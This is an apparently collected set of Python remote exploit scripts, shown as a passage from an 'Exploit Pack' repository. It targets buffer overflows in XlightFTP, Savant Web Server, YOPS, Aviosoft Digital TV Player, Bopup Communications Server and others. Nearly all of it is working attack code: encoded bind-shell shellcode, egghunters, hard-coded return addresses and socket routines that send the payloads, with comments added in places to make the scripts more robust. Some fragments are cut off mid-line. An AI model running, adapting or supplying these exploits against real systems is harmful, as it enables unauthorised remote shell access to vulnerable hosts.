23 | "\x9e\x2a\x0f\x34\xac\x87\x5b\x12\xb0\x16\x8f\x28\xcc\x93\x2e"
24 | "\xff\x45\xe7\x14\xdb\x0e\xb3\x35\x7a\xea\x12\x49\x9c\x52\xca"
25 | "\xef\xd6\x70\x1f\x89\xb4\x1e\xde\x1b\xc3\x67\xe0\x23\xcc\xc7"
26 | "\x89\x12\x47\x88\xce\xaa\x82\xed\x21\xe1\x8f\x47\xaa\xac\x45"
27 | "\xda\xb7\x4e\xb0\x18\xce\xcc\x31\xe0\x35\xcc\x33\xe5\x72\x4a"
28 | "\xaf\x97\xeb\x3f\xcf\x04\x0b\x6a\xac\xcb\x9f\xf6\x1d\x6e\x18"
29 | "\x9c\x61")
30 |
31 | # 32 byte egghunter
32 | egghunter =(
33 | "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
34 | "\x54\x30\x30\x57" # egg - W00T
35 | "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
36 |
37 | egg = "\x54\x30\x30\x57\x54\x30\x30\x57"
38 | buffer = "\x90" * (271 - len(egg + shellcode))
39 | eip = "\x13\x44\x87\x7c" # 7C874413 JMP ESP - kernel32.dll
40 | nops = "\x90" * 8
41 |
42 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
43 | try:
44 | s.connect((target,port))
45 | s.send("USER blake \r\n")
46 | s.recv(1024)
47 | s.send("PASS " + buffer + egg + shellcode + eip + nops + egghunter + "\r\n")
48 | s.recv(1024)
49 | s.close()
50 | except:
51 | sys.exit(0)
52 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/SavantWebServer.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import socket
3 |
4 | target_address=sys.argv[1]
5 | target_port=int(sys.argv[2])
6 |
7 |
8 | buffer2 = "R0cX" + "R0cX"
9 | # msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c
10 | buffer2 += ("\xbd\xec\x37\x93\x4b\xdb\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
11 | "\x6a\x83\xc0\x04\x31\x68\x10\x03\x68\x10\x0e\xc2\x4a\xa1\x17"
12 | "\x59\x49\xc2\xff\x91\x58\x90\x5d\x29\xec\xb0\x10\xb1\x92\xd3"
13 | "\xae\x07\xc5\x35\x4d\x38\xf3\xdb\x06\xfc\xec\x5f\xa5\x66\x93"
14 | "\xcc\x5d\x07\x81\xcb\xcc\x59\x35\x45\xd6\x2d\x15\xa1\xe7\xbb"
15 | "\xd6\x5d\x68\x57\x1b\x2a\x4f\xe8\xdd\xd3\xc0\x84\x0c\x0e\xb7"
16 | "\x03\x24\xc7\xfd\xd2\xa5\x88\x89\xf8\x07\x82\x1b\xcb\x2d\x3b"
17 | "\xfd\x9d\x67\xa9\xff\xe9\x20\x9e\xa9\x25\x8b\x7c\xda\xd9\x01"
18 | "\x32\x51\x36\x9a\xe7\x73\x8f\xe5\xea\x60\xa6\x4c\x78\xef\xbb"
19 | "\x1e\x37\xd0\xbd\xaa\x4f\xe7\x94\x3e\x02\x34\x21\xc6\xc1\xe2"
20 | "\xa3\x6f\x76\x92\x9a\xed\xda\x19\x2d\xca\x21\xb2\xb0\xa9\xb5"
21 | "\x72\xa1\xbb\xd0\x18\x64\xd3\xb4\x85\x0c\x92\xf7\x07\xcf\x13"
22 | "\xc2\x95\x57\x0a\x68\x6d\x94\x6f\x5a\xad\xd1\x82\x26\x9f\x3c"
23 | "\x0d\x2b\xdc\x06\x6a\xd3\x87\x24\x9c\x14\x58\x71\x42\xef\x1b"
24 | "\x90\xdc\x46\x67\x51\xd3\x4c\xc4\x11\x23\x29\xbd\xc5\xab\x96"
25 | "\x54\x5e\xb6\x08\x60\x42\x5f\x7a\x76\xdf\x30\x05\x76\xb7\xd1"
26 | "\xf2\x49\xba\x14\x69\xa7\x7b\xa8\x6b\xb9\xad\xc8\x8e\x0f\x9e"
27 | "\x07\x7f\xa7\x89\x9b\x4d\x68\xbd\x45\x77\xe0\x64\xec\xa2\x18"
28 | "\x2d\x6f\x10\xc3\x14\x1d\x4e\x92\x3a\x8a\xf0\xd8\x07\x12\x19"
29 | "\x27\x0c\x23\xe4\x0b\xbb\x6d\x97\xf8\xe8\x8c\x23\xb5\xe0\x22"
30 | "\xe8\x70\x85\x10\xbb\x64\xbe\x09\x41\xe7\x2d\x6d\x39\xfb\xcc"
31 | "\x09\xee\xca\x8f\x83\x22\x5d\x77\x2b\x5b\xc6\x1b\x82\x6e\x17"
32 | "\x03\xe8\x6c\x35\x55\x71\xd4\x35\x72\x12\x3f\x11\x6e\xcf\x09"
33 | "\x5a\xd0\x33\x40\x8e\x3f\x36\xbf\xd7\xd0\x85\x17\x03\xd3\xc4"
34 | "\x7f\x17\x6e\xe8\x0d\xa6\x5f\x9e\xd6\x1b\xf4\x2b\x8c\xb3\xad"
35 | "\x19\xb3\x70\xac\x56\x76\x0c\xfb\x4f\xc4\x99\xdd\x99\x75\x8f"
36 | "\xa8\xfa\x91\x5c\xfb\x26\xbd\x8a\xea\xec\x0d\xf1\x45\x4f\x72"
37 | "\xd1\x02\x47\x9c\xa5\x33\x1e\xf8\xc7\x00\xd2\x3d\x86\xb4\x7c"
38 | "\xb9\x85\x5f\x8c\x40\x58\x7e\x7c\x5d\x76\x3a\xd6\x0b\x9e\xfe"
39 | "\x88\xc7\x60\x56\x99\x19\x7f\x7a\xda\x93\x72\x99\x3f\x69")
40 |
41 | badbuffer = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # egghunter searching for R0cX
42 | badbuffer += "\x90" * (254 - len(badbuffer))
43 | badbuffer += "\x09\x1D\x40" # EIP Overwrite 00401D09 savant.exe POP EBP, RETN
44 | httpmethod = "\xb0\x03\x04\x01\x7B\x14" # MOV AL, 3; ADD AL, 1; JPO 14
45 |
46 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' + buffer2
47 |
48 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
49 | connect=sock.connect((target_address,target_port))
50 | sock.send(sendbuf)
51 | sock.close()
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/XlightServer3.7.0.py:
--------------------------------------------------------------------------------
1 | ###
2 | # Title : XlightFTP Server v3.7.0 Remote Root BOF Exploit
3 | # Author : KedAns-Dz
4 | # E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
5 | # Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
6 | # Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com
7 | # Facebook : http://facebook.com/KedAns
8 | # platform : windows
9 | # Impact : Remote Root Exploit & Buffer Overflow (in version 3.7.0)
10 | # Tested on : Windows XP SP3 (Fr)
11 | ##
12 | # [Indoushka & SeeMe] => Welcome back Br0ther's <3 ^^ <3
13 | ##
14 | # | >> --------+++=[ Dz Offenders Cr3w ]=+++------- << |
15 | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
16 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * T0xic |
17 | # | ------------------------------------------------ < |
18 | # + All Dz .. This is Open Group 4 L33T Dz Hax3rZ ..
19 | ###
20 |
21 | #----------------[ Exploit Code ]----------=>
22 |
23 | #!/usr/bin/python
24 |
25 | from socket import *
26 | import sys, struct, os, time
27 |
28 | print "\nXlightFTP Server v3.7.0 Remote Root BOF Exploit"
29 | if (len(sys.argv) < 3):
30 | print "\nXlightFTP Server v3.7.0 Remote Root BOF Exploit"
31 | print "\n Usage: %s \n" %(sys.argv[0])
32 | sys.exit()
33 |
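print("\n[!] Connecting to %s ..." % (sys.argv[1]))

# `socket` is bound to the socket *class* in this file (see the bare
# constructor call below), so take the module under another name to reach
# its error types.
import socket as socketlib

# connect to host
sock = socket(AF_INET, SOCK_STREAM)
# Bounded waits: without a timeout the recv() after connect (and the one
# after the send) block forever if the service never answers.
sock.settimeout(10)
try:
    sock.connect((sys.argv[1], int(sys.argv[2])))
except socketlib.error as e:
    print("[-] Could not connect to %s:%s (%s)" % (sys.argv[1], sys.argv[2], e))
    sys.exit(1)
try:
    sock.recv(1024)          # drain the greeting before sending
except socketlib.timeout:
    print("[!] No banner within 10s, sending anyway")
time.sleep(5)
#-------------------------------------------
buffer = "\x41" * 1337 # Junk
buffer += "\x90" * 123 # padding
#-------------------------------------------
# windows/shell_bind_tcp - 368 bytes
# Encoder: x86/shikata_ga_nai (http://www.metasploit.com)
# LPORT=4444, RHOST=192.168.1.2, EXITFUNC=process
buffer += ("\x33\xc9\xbf\xb8\xf7\xfd\xd9\xda\xd8\xd9\x74\x24\xf4\xb1"+
"\x56\x5d\x83\xc5\x04\x31\x7d\x0d\x03\x7d\xb5\x15\x08\x25"+
"\x2d\x50\xf3\xd6\xad\x03\x7d\x33\x9c\x11\x19\x37\x8c\xa5"+
"\x69\x15\x3c\x4d\x3f\x8e\xb7\x23\xe8\xa1\x70\x89\xce\x8c"+
"\x81\x3f\xcf\x43\x41\x21\xb3\x99\x95\x81\x8a\x51\xe8\xc0"+
"\xcb\x8c\x02\x90\x84\xdb\xb0\x05\xa0\x9e\x08\x27\x66\x95"+
"\x30\x5f\x03\x6a\xc4\xd5\x0a\xbb\x74\x61\x44\x23\xff\x2d"+
"\x75\x52\x2c\x2e\x49\x1d\x59\x85\x39\x9c\x8b\xd7\xc2\xae"+
"\xf3\xb4\xfc\x1e\xfe\xc5\x39\x98\xe0\xb3\x31\xda\x9d\xc3"+
"\x81\xa0\x79\x41\x14\x02\x0a\xf1\xfc\xb2\xdf\x64\x76\xb8"+
"\x94\xe3\xd0\xdd\x2b\x27\x6b\xd9\xa0\xc6\xbc\x6b\xf2\xec"+
"\x18\x37\xa1\x8d\x39\x9d\x04\xb1\x5a\x79\xf9\x17\x10\x68"+
"\xee\x2e\x7b\xe5\xc3\x1c\x84\xf5\x4b\x16\xf7\xc7\xd4\x8c"+
"\x9f\x6b\x9d\x0a\x67\x8b\xb4\xeb\xf7\x72\x36\x0c\xd1\xb0"+
"\x62\x5c\x49\x10\x0a\x37\x89\x9d\xdf\x98\xd9\x31\x8f\x58"+
"\x8a\xf1\x7f\x31\xc0\xfd\xa0\x21\xeb\xd7\xd7\x65\x25\x03"+
"\xb4\x01\x44\xb3\x2b\x8e\xc1\x55\x21\x3e\x84\xce\xdd\xfc"+
"\xf3\xc6\x7a\xfe\xd1\x7a\xd3\x68\x6d\x95\xe3\x97\x6e\xb3"+
"\x40\x3b\xc6\x54\x12\x57\xd3\x45\x25\x72\x73\x0f\x1e\x15"+
"\x09\x61\xed\x87\x0e\xa8\x85\x24\x9c\x37\x55\x22\xbd\xef"+
"\x02\x63\x73\xe6\xc6\x99\x2a\x50\xf4\x63\xaa\x9b\xbc\xbf"+
"\x0f\x25\x3d\x4d\x2b\x01\x2d\x8b\xb4\x0d\x19\x43\xe3\xdb"+
"\xf7\x25\x5d\xaa\xa1\xff\x32\x64\x25\x79\x79\xb7\x33\x86"+
"\x54\x41\xdb\x37\x01\x14\xe4\xf8\xc5\x90\x9d\xe4\x75\x5e"+
"\x74\xad\x86\x15\xd4\x84\x0e\xf0\x8d\x94\x52\x03\x78\xda"+
"\x6a\x80\x88\xa3\x88\x98\xf9\xa6\xd5\x1e\x12\xdb\x46\xcb"+
"\x14\x48\x66\xde")
#-------------------------------------
buffer += "\x90" * 8 # more nop's
#-------------------------------------
# Hard-coded, non-ASLR return address at offset 1836 (1337 + 123 + 368 + 8).
# NOTE(review): shell32.dll is not identical across XP language builds (the
# Spanish XP SP3 exploit in this pack needs a different shell32 address), so
# "Universal" should be read as "the XP SP3 build the author tested" --
# confirm against the target before relying on it.
buffer += "\x07\xd5\xc5\x7c" # jmp esp in shell32.dll (Windows XP SP3 - Universal)
buffer += "\x0a" # end connection
# send buffer
print("[*] Sending Buffer Junk...")
time.sleep(2)
print("[*] Spawn a Backshell Connecting...")
try:
    sock.send(buffer)
    try:
        sock.recv(1024)
    except socketlib.error:
        pass  # a reset or timeout here is expected once the service dies
finally:
    sock.close()
# The script has no way to verify the overflow worked, so report what it did
# rather than claiming success.
print("[+] Buffer sent. If the target is vulnerable, NetCat %s on port 4444\n" % (sys.argv[1]))
print("\n > Exploit By : KedAns-Dz - Dz Offenders Cr3w - Inj3ct0r Team")
sys.exit()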
90 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/YourOpenPersonalWEBSERVER_DCA-00015.py:
--------------------------------------------------------------------------------
1 | # Software:
2 | # YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
3 | #server for Linux OS written in C.
4 | # URL: http://sourceforge.net/projects/yops2009/
5 | #
6 | # Vulnerability: Rodrigo Escobar aka ipax @ DcLabs
7 | # Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs
8 | # Contact: waKKu dclabs com br
9 | #!/usr/bin/python
10 |
11 | #!/usr/bin/python
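import sys
import socket
import time

#HOST = "localhost"
#PORT = 8888
# Host and port are mandatory; fail with a usage line instead of an
# IndexError traceback.
if len(sys.argv) < 3:
    print("Usage: %s <host> <port> [buff_len]" % sys.argv[0])
    sys.exit(1)
HOST = sys.argv[1]
PORT = int(sys.argv[2])

# Optional third argument overrides the filler length. Only a missing or
# non-numeric argument falls back to the default; the original bare
# `except:` also swallowed KeyboardInterrupt and unrelated errors.
try:
    BUFF_LEN = int(sys.argv[3])
except (IndexError, ValueError):
    BUFF_LEN = 802
# Written four times right after the filler (see `buffer` below); by its
# name this is the address the clobbered saved pointer is redirected to.
# It is hard-coded for the build the authors tested, not computed --
# confirm against the target binary.
FIXUP_ADDR = "\x47\xce\x04\x08"


# Shellcode changed for winAUTOPWN by QUAKERDOOMER

#by Magnefikko
# 05.07.2010
# magnefikko@gmail.com
# Promhyl Studies :: http://promhyl.tk
# Subgroup: #PRekambr
# Name: 97 bytes bind sh@64533
# Platform: Linux x86

# This literal is a marker the winAUTOPWN tooling replaces with real
# shellcode. Run unmodified, the request carries the ASCII marker text in
# place of the bind shell, so it cannot yield a shell (it may still crash
# the service). The original 97-byte payload is kept below for reference.
shellcode = ("SHALL BE CHANGED BY WINDOWS AUTOPWN")
#("\x6a\x66\x6a\x01\x5b\x58\x99\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x52\x66\x68\xfc\x15\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x6a\x66\x58\x43\x43\x6a\x05\x56\xcd\x80\x6a\x66\x58\x43\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x6a\x3f\x58\x31\xc9\xcd\x80\x6a\x3f\x58\x41\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\x50\xb0\x0b\x59\xcd\x80")


# Request line: method, BUFF_LEN bytes of filler, the address x4, version.
buffer = "HEAD "
buffer += "A"*BUFF_LEN
buffer += FIXUP_ADDR*4
buffer += " HTTP/1.1"

stackadjust = (
    "\xcb" # instruction alignment
    "\xbc\x69\x69\x96\xb0" # Stack Adjustment
)

payload = buffer + stackadjust + shellcode + "\r\n\r\n"

print("""
######################################
### DcLabs Security Research Group ###
### +Exploit+ ###
######################################
Software: YOPS 2009 - Web Server
---
Vulnerability by: ipax
Exploit by: waKKu
Greetings to: All DcLabs members
""")

print(" [+] Using BUFF_LEN ->  %s" % BUFF_LEN)

# First connection: a harmless request (the original comment: "initialize
# data"); its reply is irrelevant, so read errors and timeouts are ignored.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)   # the unguarded recv() below otherwise blocks forever
print(" [+] Trying to establish connection...")
try:
    s.connect((HOST, PORT))
except socket.error as e:
    print(" [-] Could not connect to %s:%d (%s)" % (HOST, PORT, e))
    sys.exit(1)
print(" [+] Sending a dummy request to initialize data...")
s.send("HEAD DcLabs HTTP/1.1\r\n\r\n")
try:
    s.recv(1024)
except socket.error:
    pass   # best-effort read; socket.timeout is a socket.error subclass
finally:
    s.close()

time.sleep(3)

# Second connection carries the overflow.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
try:
    s.connect((HOST, PORT))
    print(" [+] Sending our malicious payload...")
    s.send(payload)
    print(" [+] Payload sent, good luck!")
except socket.error as e:
    print(" [-] Second connection failed (%s)" % e)
    sys.exit(1)
finally:
    s.close()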
89 |
90 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/aviosoftdigital.py:
--------------------------------------------------------------------------------
1 | # Exploit Title: Aviosoft Digital TV Player Professional 1.x Stack Buffer Overflow
2 | # Author: modpr0be
3 |
4 | import struct
5 |
# Layout constants for the overflow input. The remainder of this script
# (the SEH record and ROP chain built from them) is not in this listing.
totalsize = 5000                        # presumably the length the finished input is padded to
junk, align = "A" * 872, "B" * 136      # 872 filler bytes, then 136 "alignment" bytes (names as in the original)
9 |
10 | # aslr, dep bypass using pushad technique
11 | seh = struct.pack(' ebx
26 | rop+= struct.pack(' edx
32 | rop+= struct.pack(' \n" %(sys.argv[0])
19 | sys.exit()
20 |
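print("\n[!] Connecting to %s ..." % (sys.argv[1]))

# `socket` is the socket *class* in this file (bare constructor call below);
# import the module under another name for its error types.
import socket as socketlib

# connect to host
sock = socket(AF_INET, SOCK_STREAM)
# Bounded waits: the two recv() calls below otherwise block forever if the
# service never answers.
sock.settimeout(10)
try:
    sock.connect((sys.argv[1], int(sys.argv[2])))
except socketlib.error as e:
    print("[-] Could not connect to %s:%s (%s)" % (sys.argv[1], sys.argv[2], e))
    sys.exit(1)
try:
    sock.recv(1024)          # drain the greeting before sending
except socketlib.timeout:
    print("[!] No banner within 10s, sending anyway")
time.sleep(5)

# padding
buffer = "\x90" * 1092

# 368 bytes shellcode
buffer += ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"+
"\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"+
"\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"+
"\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"+
"\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"+
"\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"+
"\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"+
"\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"+
"\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"+
"\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"+
"\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"+
"\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"+
"\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"+
"\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"+
"\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"+
"\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"+
"\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"+
"\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"+
"\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"+
"\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"+
"\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"+
"\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"+
"\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"+
"\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"+
"\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")

# more padding
buffer += "\x90" * 8

# jmp edx (shell32.dll Windows XP SP3 Spanish) (edx points to the 1st nopsled)
# Hard-coded, non-ASLR address at offset 1468 (1092 + 368 + 8). It is tied
# to the Spanish XP SP3 shell32.dll build; other language or service-pack
# builds need their own address.
buffer += "\x9a\x5c\x3c\x7e"

# end connection
buffer += "\x0a"

# send buffer
print("[!] Sending exploit...")
try:
    sock.send(buffer)
    try:
        sock.recv(1024)
    except socketlib.error:
        pass  # a reset or timeout here is expected once the service dies
finally:
    sock.close()
# The script cannot verify the overflow worked; report what it did.
print("[!] Buffer sent. If the target is vulnerable, netcat %s on port 4444\n" % (sys.argv[1]))
sys.exit()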
75 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/bopup.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | #[*] Usage : python bopup.py [target_ip]
3 | # _ _ _ __ _ _ _
4 | #| || | (_) ___ / \ | |__ | | |
5 | #| __ | | | (_-< | () | | / / |_ _|
6 | #|_||_| |_| /__/ \__/ |_\_\ |_|
7 | #
8 | #[*] Bug : Bopup Communications Server (3.2.26.5460) Remote BOF Exploit (SEH)
9 | #[*] Tested on : Xp sp3 (EN)(VB)
10 | #[*] Refer : mu-b
11 | #[*] Exploited by : His0k4
12 | #[*] Greetings : All friends & muslims HaCkErs (DZ)
13 |
14 |
15 | import socket,sys,struct
16 | from time import *
17 |
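# Target address and port come from the command line. The usage note in the
# header lists only the IP, but the port is required as well; say so instead
# of dying with an IndexError.
if len(sys.argv) < 3:
    print("[*] Usage : python %s [target_ip] [port]" % sys.argv[0])
    sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])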
20 |
def banner():
    """Print the exploit title and author lines to stdout (each followed by a blank line)."""
    for line in ("\n[x] Bopup Communications Server Remote BOF Exploit (SEH)\n",
                 "[x] By: His0k4\n"):
        print(line)
24 |
25 | # win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
26 | # windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
27 | # EXITFUNC=seh, LPORT=4444
28 | # shellcode changed for WinAutoPWN
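# Marker that the WinAutoPWN tooling substitutes with live shellcode before
# use. Run as-is, the 35-byte marker text goes into the request in place of
# a payload, so the script can at best crash the service.
shellcode = ("SHALL BE CHANGED BY WINDOWS AUTOPWN")

# The windows/shell_bind_tcp (x86/alpha_mixed, 696 bytes) payload the marker
# replaced. The substitution left these 47 literals behind as dangling
# statements, the last one followed by a ')' that no longer matched
# anything, which made the whole file a SyntaxError; they are kept here as
# data instead.
_ORIGINAL_SHELLCODE = (
"\x89\xe1\xd9\xe1\xd9\x71\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4d\x38\x4c\x39\x4b\x4f\x4b"
"\x4f\x4b\x4f\x45\x30\x4c\x4b\x42\x4c\x46\x44\x46\x44\x4c\x4b"
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a"
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31"
"\x4a\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x46"
"\x51\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43\x37"
"\x49\x51\x48\x4a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47"
"\x4b\x50\x54\x46\x44\x51\x38\x43\x45\x4b\x55\x4c\x4b\x51\x4f"
"\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x43\x33\x46\x4c\x4c\x4b"
"\x4c\x49\x42\x4c\x47\x54\x45\x4c\x43\x51\x48\x43\x46\x51\x49"
"\x4b\x42\x44\x4c\x4b\x50\x43\x50\x30\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x43\x38\x51"
"\x4e\x43\x58\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
"\x49\x46\x42\x46\x46\x33\x43\x56\x42\x48\x47\x43\x47\x42\x42"
"\x48\x42\x57\x44\x33\x46\x52\x51\x4f\x46\x34\x4b\x4f\x4e\x30"
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48"
"\x56\x51\x4f\x4c\x49\x4b\x55\x42\x46\x4d\x51\x4a\x4d\x43\x38"
"\x45\x52\x50\x55\x43\x5a\x43\x32\x4b\x4f\x48\x50\x43\x58\x48"
"\x59\x44\x49\x4b\x45\x4e\x4d\x46\x37\x4b\x4f\x48\x56\x46\x33"
"\x51\x43\x51\x43\x50\x53\x46\x33\x50\x43\x50\x53\x51\x53\x50"
"\x53\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x43\x56"
"\x46\x33\x4b\x39\x4d\x31\x4a\x35\x45\x38\x4e\x44\x45\x4a\x42"
"\x50\x49\x57\x51\x47\x4b\x4f\x49\x46\x43\x5a\x44\x50\x50\x51"
"\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4e\x44\x4e\x4d\x46\x4e\x4d"
"\x39\x46\x37\x4b\x4f\x49\x46\x50\x53\x51\x45\x4b\x4f\x4e\x30"
"\x45\x38\x4a\x45\x51\x59\x4c\x46\x51\x59\x46\x37\x4b\x4f\x4e"
"\x36\x50\x50\x50\x54\x46\x34\x46\x35\x4b\x4f\x48\x50\x4d\x43"
"\x43\x58\x4a\x47\x42\x59\x48\x46\x44\x39\x50\x57\x4b\x4f\x4e"
"\x36\x46\x35\x4b\x4f\x48\x50\x43\x56\x42\x4a\x43\x54\x45\x36"
"\x43\x58\x45\x33\x42\x4d\x4c\x49\x4a\x45\x42\x4a\x46\x30\x50"
"\x59\x47\x59\x48\x4c\x4c\x49\x4a\x47\x42\x4a\x50\x44\x4c\x49"
"\x4a\x42\x46\x51\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
"\x4d\x4b\x4e\x51\x52\x46\x4c\x4c\x53\x4c\x4d\x42\x5a\x46\x58"
"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x44"
"\x56\x4b\x4f\x43\x45\x50\x44\x4b\x4f\x4e\x36\x51\x4b\x50\x57"
"\x50\x52\x50\x51\x46\x31\x50\x51\x42\x4a\x45\x51\x46\x31\x50"
"\x51\x46\x35\x46\x31\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x4e\x39"
"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x48\x56\x43\x5a\x4b\x4f\x4b"
"\x4f\x50\x37\x4b\x4f\x4e\x30\x4c\x4b\x50\x57\x4b\x4c\x4d\x53"
"\x49\x54\x42\x44\x4b\x4f\x4e\x36\x46\x32\x4b\x4f\x4e\x30\x43"
"\x58\x4a\x50\x4c\x4a\x45\x54\x51\x4f\x46\x33\x4b\x4f\x48\x56"
"\x4b\x4f\x4e\x30\x41\x41")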
77 |
78 |
# Message layout: a 4-byte header, filler up to offset 821 (the shellcode
# is placed so that it ends there), then the SEH-style trailer. The p/p/r
# address ends in a NUL, which is why it sits last and why the bytes before
# it are kept NUL-free ("escaping from the \x00 monster" in the original).
# NOTE(review): if len(shellcode) ever exceeds 821 the filler multiplication
# silently yields '' and every later offset shifts.
payload = ''.join([
    '\x01\x00\x00\x00',
    '\x41' * (821 - len(shellcode)),
    shellcode,
    '\x42' * 27,             # padding
    '\xE8\xFC\xFE\xFF\xFF',  # Call back
    '\x43' * 8,              # padding, escaping from the \x00 monster :p
    '\xEB\xF1\xFF\xFF',      # short jump
    '\xE0\x14\x40\x00',      # p/p/r bcssrvc (universal)
])
87 |
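banner()   # defined above but never invoked in the original

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)   # don't hang forever on a filtered port
try:
    s.connect((host, port))
except socket.error as e:   # was a bare except, which also swallowed Ctrl-C
    print("Can\'t connect to server!\n")
    print("    (%s)" % e)
    sys.exit(1)             # a failed connect is not a success exit

try:
    s.send(payload + '\r\n')
    print("[+] Done!")
finally:
    s.close()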
98 |
99 | # milw0rm.com [2009-06-29]
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/ca_bof_poc.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import codecs
3 | import random
